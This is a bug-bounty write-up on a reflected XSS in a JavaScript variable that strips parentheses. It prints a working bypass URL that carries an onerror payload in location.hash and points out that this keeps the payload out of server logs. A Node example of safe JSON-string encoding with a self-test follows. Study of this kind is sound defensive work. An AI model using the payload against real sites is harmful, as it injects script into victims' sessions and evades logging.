I came across a web application in a private bounty program that reflected my parameter value (`xss`) into a script block with the following code:

[code lang="js"]
var _s_tab = xss;
var _s_params = "";
var _s_autoScroll = true;
setTimeout("try { s_callAjax('search', ''); }
catch(ex) { setTimeout(\"s_callAjax('search', '');\", 2000);}", 50);
[/code]

So what I tried next was to put an XSS vector in place:

[sourcecode language="plain"]vuln-site/?t=xss;alert(1);//[/sourcecode]

Which reflected:

[code lang="js"]
var _s_tab = xss;alert1;//;
[/code]

So it stripped the `(` and `)` characters, leaving `alert1` where `alert(1)` had been. I thought to myself: a challenge!

My next step was to try something I had already used in previous research: carry the payload in location.hash, so that the reflected part of the URL needs no parentheses at all, and then execute it from there.

[sourcecode language="plain"]vuln-site/?t=1;document.body.innerHTML=location.hash#<img src=x onerror=prompt(1)>[/sourcecode]

The other good thing about this type of attack is that the payload lives in the URL fragment (everything after `#`), which the browser never sends to the server, so the server's logs never contain the actual attack payload, only the harmless-looking `t` parameter.
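From the defender's side, the root cause here is not the missing parenthesis filter but the fact that a request parameter is pasted into JavaScript source as-is. The following is an added example (not code from the original post or from the affected site) contrasting a filter that strips `(` and `)` with proper output encoding of the value as a JSON string literal; the function names `unsafeEmbed`, `safeEmbed`, `jsStringLiteral` and `roundTrip` are my own assumptions for illustration. It goes slightly beyond the post by also escaping the characters that break out of a `<script>` block and by round-tripping the rendered script through `new Function` to show that the encoded value comes back unchanged as data rather than running as code.

```javascript
// Added example (not from the original post). Demonstrates why stripping
// "(" and ")" does not make a reflected JS variable safe, and what the
// server should emit instead. All names below are illustrative assumptions.

// Roughly what the vulnerable page did: drop parentheses, then splice the
// raw value into JavaScript source as an identifier/expression.
function unsafeEmbed(tabValue) {
  const filtered = tabValue.replace(/[()]/g, "");
  return `var _s_tab = ${filtered};`;
}

// Hardened form: serialize the value as a JSON string literal, then escape
// the characters that can still break out of a <script> block or the
// literal itself. "<", ">" and "&" become \uXXXX so "</script>" can never
// appear in the output; U+2028/U+2029 are valid inside JSON strings but are
// line terminators to older JavaScript parsers, so they are escaped too.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function safeEmbed(tabValue) {
  return `var _s_tab = ${jsStringLiteral(tabValue)};`;
}

// Check used by the self-test: render the variable declaration with the
// given embedder, evaluate it in an isolated function, and return what
// _s_tab ended up holding. A correct encoder must return the input string
// unchanged; an injection shows up as a parse error or as a ReferenceError
// when the smuggled statements touch names such as "document".
function roundTrip(embed, tabValue) {
  try {
    const value = new Function(embed(tabValue) + "\nreturn _s_tab;")();
    return { ok: true, value };
  } catch (err) {
    return { ok: false, error: err.name };
  }
}

// Constructed sample inputs: the two values from the post, plus a classic
// script-block breakout that a parenthesis filter would not touch at all.
const SAMPLES = [
  "xss;alert(1);//",
  "1;document.body.innerHTML=location.hash",
  "</script><img src=x>",
];

function demo() {
  for (const sample of SAMPLES) {
    const unsafe = roundTrip(unsafeEmbed, sample);
    const safe = roundTrip(safeEmbed, sample);
    console.log(JSON.stringify(sample));
    console.log("  filtered  :", unsafeEmbed(sample), "->", JSON.stringify(unsafe));
    console.log("  encoded   :", safeEmbed(sample), "->", JSON.stringify(safe));
    if (!safe.ok || safe.value !== sample) {
      throw new Error("encoder did not round-trip: " + sample);
    }
  }
}

if (typeof require !== "undefined" && require.main === module) {
  demo();
}
```

Run it with `node` and compare the two columns: the filtered variant still hands the injected statements to the parser (the round trip fails because those statements execute), while the encoded variant yields exactly the submitted string as the value of `_s_tab`, whatever characters it contains. A Content-Security-Policy without `'unsafe-inline'` for scripts would stop this class of reflection outright, but the encoding fix is the one that belongs at the point where the value is written into the page.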
